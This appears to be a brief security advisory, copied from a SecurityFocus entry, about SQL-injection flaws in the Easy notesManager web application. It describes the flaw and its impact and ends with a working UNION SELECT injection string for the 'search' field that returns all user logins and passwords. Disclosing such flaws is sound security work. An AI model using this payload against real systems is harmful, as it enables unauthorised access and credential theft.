9 lines
No EOL
561 B
Text
9 lines
No EOL
561 B
Text
source: https://www.securityfocus.com/bid/20803/info
|
|
|
|
Easy notesManager is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in SQL queries.
|
|
|
|
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
|
|
|
|
Supplying the following to the 'search' field will return a list of all users and passwords:
|
|
|
|
dontcare')) union select 0,login,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from users -- |